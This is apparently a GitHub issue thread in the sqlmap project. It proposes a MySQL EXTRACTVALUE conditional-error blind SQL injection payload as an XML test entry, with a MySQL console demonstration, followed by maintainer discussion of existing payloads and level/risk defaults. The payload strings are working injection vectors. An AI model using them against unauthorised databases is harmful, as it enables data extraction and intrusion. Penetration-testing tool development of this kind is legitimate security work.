### ISSUE TITLE
A faster blind for MySQL

### ISSUE THREAD

**Issue by beefour** [sqlmapproject/sqlmap#5585]
When sqlmap was used on a page that would give an empty response for an error condition, it chose a timing based blind against MySQL.  In such cases, this payload could be faster than timing (slow) or benchmarking (slow and can have negative impact), and it is more thread friendly:

sqlmap/data/xml/payloads/boolean_blind.xml:
```
    <test>
        <title>AND conditional error based blind - EXTRACTVALUE</title>
        <stype>1</stype>
        <level>1</level>
        <risk>3</risk>
        <clause>1</clause>
        <where>1</where>
        <vector>AND EXTRACTVALUE(1,CASE WHEN ([INFERENCE]) THEN null ELSE 0x3a END)</vector>
        <request>
            <payload>AND EXTRACTVALUE(1,CASE WHEN ([RANDNUM]=[RANDNUM]) THEN null ELSE 0x3a END)</payload>
        </request>
        <response>
            <comparison>AND EXTRACTVALUE(1,CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN null ELSE 0x3a END)</comparison>
        </response>
        <details>
            <dbms>MySQL</dbms>
        </details>
    </test>
```

It uses a case statement to conditionally pass a bad argument to the EXTRACTVALUE function:

```
> SELECT EXTRACTVALUE(1, null);
+-----------------------+
| EXTRACTVALUE(1, null) |
+-----------------------+
| NULL                  |
+-----------------------+
1 row in set (0.001 sec)

> SELECT EXTRACTVALUE(1, 0x3a);
ERROR 1105 (HY000): XPATH syntax error: ':'
```

**Comment by stamparm** [comment]
there are already similar payloads:

1) RLIKE - https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/payloads/boolean_blind.xml#L391-L408
2) MAKE_SET - https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/payloads/boolean_blind.xml#L410-L427
3) ELT - https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/payloads/boolean_blind.xml#L448-L465
4) bool*int - https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/payloads/boolean_blind.xml#L486-L503

i don't see what's the advantage of the proposed OR to be more specific, i am not sure why those would fail and yours would work

**Comment by beefour** [comment]
Good point, I can't get 2, 3 and 4 to work, but 1 does, does the order of the payloads file prioritise timing over error condition byt default?

**Comment by stamparm** [comment]
error is always prioritized over the boolean/time/stacked payloads

**Comment by stamparm** [comment]
@beefour with the latest revision, `bool*int` has been replaced with proposed `EXTRACTVALUE`

**Comment by beefour** [comment]
I think the default behaviour was because "MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)" is level 1, so with no level specified and technique of BT, it chooses T, because the error condition blinds were all > level 1.  If risk is evasion related then less errors is good, but for exfil speed it might be good to have one error condition blind at level 1 and a medium risk?

**Comment by stamparm** [comment]
sqlmap should ask you if there is a MySQL error if you would automatically
raise the level/risk. Also, you said that other payloads were not working
for you.

there won't be any more related commits

**Comment by beefour** [comment]
The XML block is duplicated with levels 1 and 3, risk is 5, should be 1-3, L5R3 would work but timing prefered with technique=BT
